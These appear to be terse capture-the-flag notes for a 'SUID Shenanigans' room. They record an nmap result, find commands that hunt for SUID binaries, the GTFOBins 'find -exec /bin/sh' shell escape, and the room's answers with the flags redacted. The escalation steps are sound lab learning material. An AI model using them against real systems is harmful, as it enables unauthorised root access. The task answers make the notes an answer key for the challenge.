SUID Shenanigans

nmap
65534 - ssh

find suid perm for user igor
find / -user igor -type f -perm /4000 2> /dev/null   /usr/bin/find
						     /usr/bin/nmap

exploit find command by {gtfobins}
find . -exec /bin/sh \; -quit
cat /home/igor/flag1.txt
{answer 2}

find / -user root -type f -perm /4000 2> /dev/null
/usr/bin/system-control   --> allow to run command
{answer 3}

Task

• What port is SSH running on?

  65534
  

• Find and run a file as igor. Read the file /home/igor/flag1.txt

  [redacted challenge flag]
  

• Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?

  [redacted challenge flag]